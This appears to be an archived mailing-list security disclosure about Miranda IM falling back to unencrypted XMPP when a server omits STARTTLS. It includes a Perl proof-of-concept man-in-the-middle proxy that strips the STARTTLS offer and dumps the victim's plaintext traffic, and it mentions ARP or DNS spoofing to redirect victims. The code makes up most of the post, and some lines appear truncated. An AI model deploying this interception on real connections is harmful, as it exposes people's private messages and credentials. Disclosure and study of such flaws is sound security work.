[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Miranda TLS MitM with XMPP/Jabber protocol

The Miranda IM instant messaging software silently falls back to unencrypted connections if a Jabber/XMPP server does not report that it supports TLS, even if "Use TLS" is checked. This allows an active attacker to perform MitM attacks on Jabber/XMPP connections which the user assumes to be secure.

Proof of concept MitM server attached.

Miranda IM team was notified via bugtracker. Issue was closed without being fixed, probably because of confusion with another, similar issue (posted here before, seemingly unrelated configuration settings could completely disable TLS, that one was fixed). I commented twice that this bug is not fixed, but no response was seen.

Workaround: Use SSL.

# Miranda IM TLS MitM Proof of Concept
# by Jan Schejbal, 2010-03-19

# Generally: Will work if client also accepts unencrypted connections
# if the server reports that TLS is not supported.

# Tested only on WinXP SP3 with ActivePerl 5.10.0
# against Miranda 0.8.16

# Usage:
#  1. Setup variables below, unless you want to test against jabber.ccc.de
#       (note that this script does not do real XML parsing. Other servers
#        might have slightly different code that will not be detected.
#        In such a case, connecting will lock up. Adapt the RegExp below.) 
#  2. Make 'victim' connect to this server instead of real server
#       Network->Jabber->Account->Manually specify connection host
#       (real attacks would use ARP spoofing, DNS spoofing or similar.)
#  3. Enable 'Use TLS'
#       (make sure that 'Disable SASL' on advanced is UNCHECKED,
#        as it silently disables TLS!)
#  4. Start script and connect with miranda
#  5. If all works, the dump goes to STDOUT, state is shown on STDERR.
#       (All traffic should be sent in plain now!)

use strict;
use warnings;

use IO::Socket;
use IO::Select;

my $server = 'jabber.ccc.de';
my $port = 5222;
my $listenport = $port;

my $sock = new IO::Socket::INET(
    LocalHost => '',
    LocalPort => $listenport,
    Proto => 'tcp',
    Listen => 1,
    Reuse => 1,

print STDERR "Listening on $listenport for jabber connections\n";
print STDERR "Will forward to $server:$port\n";
my $client_connection = $sock->accept();

print STDERR "Incoming connection\n";

my $server_connection = new IO::Socket::INET(
    PeerAddr => $server,
    PeerPort => $port,
    Proto => 'tcp',

print STDERR "Connected to server\n";


my $sel = IO::Select->new();

my $server_hello_done = 0;
my $server_hello_data;

my $readdata;
my @ready;
while(@ready = $sel->can_read()) {
  foreach my $ready_conn (@ready) {
    if (!sysread($ready_conn, $readdata, 10000)) {
      print STDERR "\nReading failed!\n";
    print "$readdata\n";
    if ($ready_conn == $server_connection) {
      # read was from server
      if (!$server_hello_done) {
        $server_hello_data .= $readdata;
        print STDERR "\nCurrent server hello buf: $server_hello_data\n\n";
        if ($server_hello_data =~ s|<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>||) {
          print STDERR "removed STARTTLS offer from server hello\n";
          $server_hello_done = 1;
          print $client_connection $server_hello_data;
          print STDERR "\nforwarded cached server hello buf: \n$server_hello_data\n\n";
          print STDERR "MitM complete. Forwarding data ('<' = to client, '>' = to server)\n";
      } else {
        print $client_connection $readdata;
        if ($server_hello_done) { print STDERR '<'; }
    } else {
      # read was from client, send to server
      print $server_connection $readdata;
      if ($server_hello_done) { print STDERR '>'; }